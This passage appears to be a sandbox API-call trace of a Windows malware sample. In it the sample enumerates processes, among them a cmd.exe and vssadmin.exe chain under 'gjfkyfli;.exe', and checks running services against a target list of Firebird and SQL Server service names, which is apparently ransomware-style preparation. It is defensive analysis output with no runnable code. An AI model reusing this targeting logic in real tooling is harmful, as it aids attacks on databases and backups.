	[0055.646] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0055.646] lstrlenW (lpString="taskeng.exe") returned 11
	[0055.646] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0055.646] lstrlenW (lpString="taskhost.exe") returned 12
	[0055.646] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0055.647] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0055.647] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0055.647] lstrlenW (lpString="python tragedy.exe") returned 18
	[0055.648] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0055.648] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0055.648] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0055.648] lstrlenW (lpString="computers.exe") returned 13
	[0055.648] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0055.649] lstrlenW (lpString="separated.exe") returned 13
	[0055.649] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0055.649] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0055.649] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0055.650] lstrlenW (lpString="darkness.exe") returned 12
	[0055.650] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0055.650] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0055.650] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0055.651] lstrlenW (lpString="sophisticated.exe") returned 17
	[0055.651] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0055.651] lstrlenW (lpString="wishlist.exe") returned 12
	[0055.651] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0055.652] lstrlenW (lpString="top.exe") returned 7
	[0055.652] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0055.652] lstrlenW (lpString="implemented.exe") returned 15
	[0055.652] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0055.653] lstrlenW (lpString="comp.exe") returned 8
	[0055.653] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0055.653] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0055.653] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0055.654] lstrlenW (lpString="solved.exe") returned 10
	[0055.654] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0055.654] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0055.654] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0055.655] lstrlenW (lpString="trips.exe") returned 9
	[0055.655] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0055.655] lstrlenW (lpString="tumormanual.exe") returned 15
	[0055.655] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0056.606] lstrlenW (lpString="telecom.exe") returned 11
	[0056.607] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0056.610] lstrlenW (lpString="realistic.exe") returned 13
	[0056.610] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0056.610] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0056.610] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0056.611] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0056.611] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0056.611] lstrlenW (lpString="cmd.exe") returned 7
	[0056.611] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0056.612] lstrlenW (lpString="conhost.exe") returned 11
	[0056.612] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0056.614] lstrlenW (lpString="vssadmin.exe") returned 12
	[0056.614] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0056.615] lstrlenW (lpString="VSSVC.exe") returned 9
	[0056.615] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0056.615] lstrlenW (lpString="svchost.exe") returned 11
	[0056.615] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0056.616] CloseHandle (hObject=0x210) returned 1
	[0056.616] Sleep (dwMilliseconds=0x1f4) 
	[0057.822] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fc70
	[0057.826] EnumServicesStatusExW (in: hSCManager=0x7e0fc70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0057.826] GetLastError () returned 0xea
	[0057.826] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0057.827] EnumServicesStatusExW (in: hSCManager=0x7e0fc70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0057.828] CloseServiceHandle (hSCObject=0x7e0fc70) returned 1
	[0057.828] lstrlenW (lpString="Appinfo") returned 7
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0057.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0057.837] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0057.837] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0057.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0057.837] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0057.837] lstrlenW (lpString="AudioSrv") returned 8
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0057.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0057.837] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0057.837] lstrlenW (lpString="BFE") returned 3
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0057.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0057.837] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0057.837] lstrlenW (lpString="CryptSvc") returned 8
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0057.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0057.837] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0057.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0057.837] lstrlenW (lpString="CscService") returned 10
	[0057.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0057.838] lstrlenW (lpString="DcomLaunch") returned 10
	[0057.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0057.838] lstrlenW (lpString="Dhcp") returned 4
	[0057.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0057.838] lstrlenW (lpString="Dnscache") returned 8
	[0057.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0057.838] lstrlenW (lpString="DPS") returned 3
	[0057.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0057.838] lstrlenW (lpString="eventlog") returned 8
	[0057.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0057.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0057.838] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0057.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0057.838] lstrlenW (lpString="EventSystem") returned 11
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0057.839] lstrlenW (lpString="gpsvc") returned 5
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0057.839] lstrlenW (lpString="iphlpsvc") returned 8
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0057.839] lstrlenW (lpString="LanmanServer") returned 12
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0057.839] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0057.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0057.839] lstrlenW (lpString="lmhosts") returned 7
	[0057.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0057.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0057.839] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0057.839] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0057.840] lstrlenW (lpString="MMCSS") returned 5
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0057.840] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0057.840] lstrlenW (lpString="MpsSvc") returned 6
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0057.840] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0057.840] lstrlenW (lpString="Netman") returned 6
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0057.840] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0057.840] lstrlenW (lpString="netprofm") returned 8
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0057.840] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0057.840] lstrlenW (lpString="NlaSvc") returned 6
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0057.840] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0057.840] lstrlenW (lpString="nsi") returned 3
	[0057.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0057.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0057.840] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0057.841] lstrlenW (lpString="PcaSvc") returned 6
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0057.841] lstrlenW (lpString="PlugPlay") returned 8
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0057.841] lstrlenW (lpString="Power") returned 5
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0057.841] lstrlenW (lpString="ProfSvc") returned 7
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0057.841] lstrlenW (lpString="RpcEptMapper") returned 12
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0057.841] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0057.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0057.841] lstrlenW (lpString="RpcSs") returned 5
	[0057.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0057.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0057.842] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0057.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0057.842] lstrlenW (lpString="SamSs") returned 5
	[0057.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0057.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
